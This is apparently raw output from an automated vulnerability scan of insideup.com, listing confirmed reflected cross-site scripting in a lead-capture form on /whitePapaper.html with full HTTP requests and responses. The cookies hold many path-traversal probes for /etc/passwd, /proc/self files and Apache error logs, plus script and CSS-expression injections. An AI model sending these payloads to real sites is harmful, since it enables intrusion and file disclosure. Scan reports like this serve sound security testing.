href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <div class="clear"></div> <style>/* CSS Document */body{ line-height:18px; } #wrapper{ width:878px; margin:0 auto; padding-top:20px; } h11{ font:20px Verdana, Arial, Helvetica, sans-serif; margin:0px; padding:0px; } span.green{ color:#33a415; } h11 span.r{ font-size:14px; } h2{ font:bold 14px Verdana, Arial, Helvetica, sans-serif; color:#4f4f4f; margin:0px; padding:0; } h3{ font:bold 14px Verdana, Arial, Helvetica, sans-serif; color:#006cff; margin:0px; padding:0px; } h4{ font:bold 16px Verdana, Arial, Helvetica, sans-serif; color:#006cff; margin:0px; padding:0px; } .quote{ font:12px Verdana, Arial, Helvetica, sans-serif; line-height:20px; } .contentWrapper{ }/*--BOX BOX BOX--*/ .greyBox{ background:url(../images/box1.jpg) no-repeat left top #eeeeee; margin:15px 0; } .greyBox1{ background:url(../images/box2.jpg) no-repeat right top; } .greyBox2{ background:url(../images/box3.jpg) no-repeat right bottom; } .greyBox3{ background:url(../images/box4.jpg) no-repeat left bottom; padding:10px 15px; } .contactForm td{ padding:5px;}/*--BOX BOX BOX--*/ </style><div id="wrapper"><a class="secondaryAction" href="advertise.html" >Advertise</a> | <a class="secondaryAction" href="howitworks.html"> How It Works </a>|<a class="secondaryAction" style="margin-left:0;text-decoration:none;"><strong> Case Studies</strong> 
</a>|<a href="competitivecomparision.html" class="secondaryAction"> Competitive Comparison </a>|<a href="advertiserFAQs.html" class="secondaryAction"> Advertiser FAQs </a>|<a href="advertiserTerms.html" class="secondaryAction"> Advertiser Terms </a>|<a href="http://insideup.com/blogs/b2bleadgen" class="secondaryAction"> Marketing Blog </a>|<a href="marketingWhitepaper.html" class="secondaryAction"> Marketing Whitepaper </a><div class="contentWrapper"><table border="0" cellspacing="0" cellpadding="0"> <tr> <td scope="row" width="575"> <h11> <span style="font-size:15px;">TeleDirect Call Centers Case Study</span> |<a href="vocalocitycasestudy.html" style="font-size:15px;"> Vocalocity Voice Over IP Case Study</a> </h11> <br/><br/> <h2>The Leader in Call Center Services for Business Joins Forces with InsideUp to Dramatically Increase Sales Leads & Conversions</h2> <div> <div class="greyBox"> <div class="greyBox1"> <div class="greyBox2"> <div class="greyBox3"> <h3>InsideUp Client Overview</h3> TeleDirect Call Centers has been supporting the business community with outstanding call center services for 50 years and has grown into today's advanced, full-service provider of choice. TeleDirect employs more than 100 professional, courteous CSRs who present first-rate impressions for clients, and the firm deploys cutting-edge technology to handle any call volume. The firm has been on the Sacramento Business Journal's "Fastest Growing Companies" list for six consecutive years!</div> </div> </div> </div> </div> <img src="/images/partition_dash_bar.jpg" /> <img src="/images/tldr.jpg" alt="banner" border="0" usemap="#Map" /> <div class="quote"><span class="green">"</span>InsideUp far exceeded our expectations. InsideUp leads were not only qualified and verified..they were either warm or hot to the touch! Plus they were exactly the prospects that hit our sweet spot. 
Thanks to InsideUp, our business has grown significantly<span class="green">"</span> <strong style="color:#0066FF; display:block;">Tom Coshow, CEO TeleDirect</strong></div> <img src="/images/partition_dash_bar.jpg" /></td> <td valign="top" style=" padding-left:18px;"> <div style="padding:10px; background:#87baff; font:11px Verdana, Arial, Helvetica, sans-serif; line-height:18px;"> <form method="post" action="/whitePapaper.html"> <input type="hidden" name="src" value="teledirectcasestudy"> <input type="hidden" name="parentPage" value="3"> <table class="contactForm" cellpadding="5"> <tr> <td colspan="2" class="head"><span style="color: #000; font-family: Arial,Helvetica,sans-serif; font-size: 17px; font-weight: bold; line-height:20px;">To get more information about becoming a marketing partner of InsideUp, complete and submit the form below:</span></td> </tr> <tr> <td width="108" style="width: 100px;">First Name</td> <td width="144" style="text-align: left;"> <input name="firstName" type="text" value="Smith"/> </td> </tr> <tr> <td>Last Name</td> <td> <input name="lastName" type="text" value="Smith"/> </td> </tr> <tr> <td>Company</td> <td> <input name="company" type="text" value="3"/> </td> </tr> <tr> <td>Phone Number</td> <td> <input name="phone" type="text" value="3"/> </td> </tr> <tr> <td>Email Address</td> <td> <input name="email" type="text" value="'"--></style></script><script>netsparker(0x001181)</script>"/> </td> </tr> <tr> <td>Website</td> <td> <input name="url" type="text" value="3"> </td> </tr> <tr> <td>Your Company's <br> Services?</td> <td align="left" valign="top"> <inpu..
- /whitePapaper.html

/whitePapaper.html CONFIRMED

http://www.insideup.com/whitePapaper.html

Parameters

Parameter Type Value
company POST 3
companyServices POST 3
email POST netsparker@example.com
firstName POST '"--></style></script><script>alert(0x001192)</script>
lastName POST Smith
parentPage POST 3
phone POST 3
src POST teledirectcasestudy
Submit POST 3
url POST 3

Request

POST /whitePapaper.html HTTP/1.1
Referer: http://www.insideup.com/teledirectcasestudy.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 229
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

company=3&companyServices=3&email=netsparker%40example.com&firstName='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001192)%3c%2fscript%3e&lastName=Smith&parentPage=3&phone=3&src=teledirectcasestudy&Submit=3&url=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:39:23 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=22AC2EDF5FF9BF6F022B42B710644A4B; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html><html><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content=""/> <meta name="description" content=""/> <meta name="robots" content="index; follow"/> <title></title> <link href="/css/reset.css" rel="stylesheet" type="text/css"><link href="/css/grid.css" rel="stylesheet" type="text/css"><link href="/css/newstyle.css" rel="stylesheet" type="text/css"><script type="text/javascript" src="/js/jquery-1.2.1.js"></script><script type="text/javascript" src="/js/ajax.js"></script><script type="text/javascript" src="/js/ajax-dynamic-list.js"></script><script type="text/javascript" src="/js/default.js"></script><script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {}</script></head><body><div class="container"> <div class="wrapper"> <div class="header"> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; 
padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> <option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. 
Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." >Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value=""> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" 
onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('White Paper Form',0,'')" alt="" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerAdvertiseActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Partner</a></li> <li class="headerAboutus"><a 
href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <div class="clear"></div> <style>/* CSS Document */body{ line-height:18px; } #wrapper{ width:878px; margin:0 auto; padding-top:20px; } h11{ font:20px Verdana, Arial, Helvetica, sans-serif; margin:0px; padding:0px; } span.green{ color:#33a415; } h11 span.r{ font-size:14px; } h2{ font:bold 14px Verdana, Arial, Helvetica, sans-serif; color:#4f4f4f; margin:0px; padding:0; } h3{ font:bold 14px Verdana, Arial, Helvetica, sans-serif; color:#006cff; margin:0px; padding:0px; } h4{ font:bold 16px Verdana, Arial, Helvetica, sans-serif; color:#006cff; margin:0px; padding:0px; } .quote{ font:12px Verdana, Arial, Helvetica, sans-serif; line-height:20px; } .contentWrapper{ }/*--BOX BOX BOX--*/ .greyBox{ background:url(../images/box1.jpg) no-repeat left top #eeeeee; margin:15px 0; } .greyBox1{ background:url(../images/box2.jpg) no-repeat right top; } .greyBox2{ background:url(../images/box3.jpg) no-repeat right bottom; } .greyBox3{ background:url(../images/box4.jpg) no-repeat left bottom; padding:10px 15px; } .contactForm td{ padding:5px;}/*--BOX BOX BOX--*/ </style><div id="wrapper"><a class="secondaryAction" href="advertise.html" >Advertise</a> | <a class="secondaryAction" href="howitworks.html"> How It Works </a>|<a class="secondaryAction" style="margin-left:0;text-decoration:none;"><strong> Case Studies</strong> 
</a>|<a href="competitivecomparision.html" class="secondaryAction"> Competitive Comparison </a>|<a href="advertiserFAQs.html" class="secondaryAction"> Advertiser FAQs </a>|<a href="advertiserTerms.html" class="secondaryAction"> Advertiser Terms </a>|<a href="http://insideup.com/blogs/b2bleadgen" class="secondaryAction"> Marketing Blog </a>|<a href="marketingWhitepaper.html" class="secondaryAction"> Marketing Whitepaper </a><div class="contentWrapper"><table border="0" cellspacing="0" cellpadding="0"> <tr> <td scope="row" width="575"> <h11> <span style="font-size:15px;">TeleDirect Call Centers Case Study</span> |<a href="vocalocitycasestudy.html" style="font-size:15px;"> Vocalocity Voice Over IP Case Study</a> </h11> <br/><br/> <h2>The Leader in Call Center Services for Business Joins Forces with InsideUp to Dramatically Increase Sales Leads & Conversions</h2> <div> <div class="greyBox"> <div class="greyBox1"> <div class="greyBox2"> <div class="greyBox3"> <h3>InsideUp Client Overview</h3> TeleDirect Call Centers has been supporting the business community with outstanding call center services for 50 years and has grown into today's advanced, full-service provider of choice. TeleDirect employs more than 100 professional, courteous CSRs who present first-rate impressions for clients, and the firm deploys cutting-edge technology to handle any call volume. The firm has been on the Sacramento Business Journal's "Fastest Growing Companies" list for six consecutive years!</div> </div> </div> </div> </div> <img src="/images/partition_dash_bar.jpg" /> <img src="/images/tldr.jpg" alt="banner" border="0" usemap="#Map" /> <div class="quote"><span class="green">"</span>InsideUp far exceeded our expectations. InsideUp leads were not only qualified and verified..they were either warm or hot to the touch! Plus they were exactly the prospects that hit our sweet spot. 
Thanks to InsideUp, our business has grown significantly<span class="green">"</span> <strong style="color:#0066FF; display:block;">Tom Coshow, CEO TeleDirect</strong></div> <img src="/images/partition_dash_bar.jpg" /></td> <td valign="top" style=" padding-left:18px;"> <div style="padding:10px; background:#87baff; font:11px Verdana, Arial, Helvetica, sans-serif; line-height:18px;"> <form method="post" action="/whitePapaper.html"> <input type="hidden" name="src" value="teledirectcasestudy"> <input type="hidden" name="parentPage" value="3"> <table class="contactForm" cellpadding="5"> <tr> <td colspan="2" class="head"><span style="color: #000; font-family: Arial,Helvetica,sans-serif; font-size: 17px; font-weight: bold; line-height:20px;">To get more information about becoming a marketing partner of InsideUp, complete and submit the form below:</span></td> </tr> <tr> <td width="108" style="width: 100px;">First Name</td> <td width="144" style="text-align: left;"> <input name="firstName" type="text" value="'"--></style></script><script>netsparker(0x001192)</script>"/> </td> </tr> <tr> <td>Last Name</td> <td> <input name="lastName" type="text" value="Smith"/> </td> </tr> <tr> <td>Company</td> <td> <input name="company" type="text" value="3"/> </td> </tr> <tr> <td>Phone Number</td> <td> <input name="phone" type="text" value="3"/> </td> </tr> <tr> <td>Email Address</td> <td> <input name="email" type="text" value="netsparker@example.com"/> </td> </tr> <tr> <td>Website</td> <td> <input name="url" type="text" value="3"> </td> </tr> <tr> <td>Your Company's <br> Services?</td> <td align="left" valign="top"> ..
- /whitePapaper.html

/whitePapaper.html CONFIRMED

http://www.insideup.com/whitePapaper.html

Parameters

Parameter        Type   Value
company          POST   3
companyServices  POST   3
email            POST   netsparker@example.com
firstName        POST   Smith
lastName         POST   '"--></style></script><script>alert(0x0011A1)</script>
parentPage       POST   3
phone            POST   3
src              POST   teledirectcasestudy
Submit           POST   3
url              POST   3

Request

POST /whitePapaper.html HTTP/1.1
Referer: http://www.insideup.com/teledirectcasestudy.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[../../../../../../../../../../proc/self/fd/2\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 